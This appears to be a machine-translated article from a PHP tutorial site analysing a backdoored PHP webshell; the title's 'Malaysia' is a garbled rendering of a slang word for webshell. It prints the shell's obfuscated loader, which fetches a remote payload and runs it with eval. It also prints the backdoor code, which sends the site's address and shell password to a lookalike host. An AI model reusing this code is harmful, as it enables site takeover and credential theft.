Home > Article > Backend Development > What is php Malaysia
What is php Malaysia
- (*-*)浩Original
- 2019-10-09 13:51:135512browse
大马: refers to Trojan virus; php Dama is a program written in PHP to extract site permissions; because it has the function of elevating rights or modifying the site, it is called Trojan.
#Someone shared a php Malaysia (said it was through waf), 80% of which has a backdoor, and I briefly analyzed it (Recommended learning: PHP video tutorial)
<?php
$password='Shiqi';//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION['PhpCode'])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION['PhpCode']=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));
@eval($un($_SESSION['PhpCode']));
?>There are three variables in total, $url, $get, $un. First, convert several variables ascii into strings. To see what it is, just use echo to output it.
It is a simple encryption based on base64 plus gzinflate
Backdoor part:
if(isset($_GET['login'])=='geturl'){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=');
$url=$copyurl.$serveru.'&pass='.$serverp;
$url=urldecode($url);
GetHtml($url);
}
function geturl(){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('');
$url=$copyurl.$serveru.'&p='.$serverp;
$url=urldecode($url);
GetHtml($url);
}The above is the detailed content of What is php Malaysia. For more information, please follow other related articles on the PHP Chinese website!